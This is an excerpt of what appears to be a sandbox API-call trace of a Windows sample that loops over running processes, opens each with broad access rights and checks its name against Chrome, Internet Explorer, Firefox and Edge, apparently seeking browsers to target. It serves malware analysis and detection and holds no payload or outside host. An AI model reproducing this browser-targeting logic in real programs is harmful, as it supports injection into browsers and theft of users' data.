	[0247.096] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.096] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0247.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x97e4
	[0247.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.097] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.097] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.098] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.098] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.098] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0247.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x97e8
	[0247.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.099] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0247.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.099] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.100] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0247.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.100] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.100] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x97ec
	[0247.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.101] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.101] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.102] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.102] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.103] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0247.103] CloseHandle (hObject=0x4fd0) returned 1
	[0247.103] Sleep (dwMilliseconds=0x64) 
	[0247.215] GetCurrentProcessId () returned 0x110
	[0247.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0247.217] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0247.218] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0247.218] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0247.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x97f0
	[0247.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.219] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0247.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.220] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.220] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0247.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.220] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.220] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0247.221] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x97f4
	[0247.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.221] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0247.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.222] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.222] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0247.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.222] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.222] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0247.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x97f8
	[0247.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.223] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0247.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.224] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.224] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0247.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.224] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.224] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0247.225] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x97fc
	[0247.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.226] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0247.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.226] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.226] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0247.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.227] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.227] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0247.227] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9804
	[0247.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.228] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0247.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.228] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.228] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0247.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.229] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.229] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0247.230] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9808
	[0247.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.230] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0247.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.231] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.231] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0247.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.231] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.232] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0247.232] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x980c
	[0247.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.233] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0247.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.233] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.233] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0247.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.233] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.234] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0247.234] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9810
	[0247.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.234] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0247.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.235] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.235] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0247.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.235] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.235] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.236] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9814
	[0247.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.236] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.236] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.237] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.237] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.237] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.238] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9818
	[0247.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.238] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.239] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.239] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.239] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.239] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.240] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x981c
	[0247.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.240] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.241] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.241] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.241] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.241] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9820
	[0247.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.242] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.243] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.243] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.243] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.243] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.244] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9824
	[0247.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.244] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.245] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.245] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.246] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.246] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.247] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9828
	[0247.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.247] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.247] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.248] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.248] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.248] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.249] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x982c
	[0247.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.249] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.249] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.250] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.250] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.250] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0247.251] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9830
	[0247.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.251] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0247.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.252] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.252] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0247.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.252] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.252] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.253] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9834
	[0247.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.253] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.254] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.254] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.254] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.254] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0247.255] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9838
	[0247.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.255] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.256] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.256] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.256] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.256] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0247.257] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x983c
	[0247.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.257] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0247.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.258] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.258] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0247.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.258] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.258] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.259] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9840
	[0247.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.259] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.260] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.260] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.260] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.293] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0247.294] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9844
	[0247.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.294] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0247.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.295] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.295] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
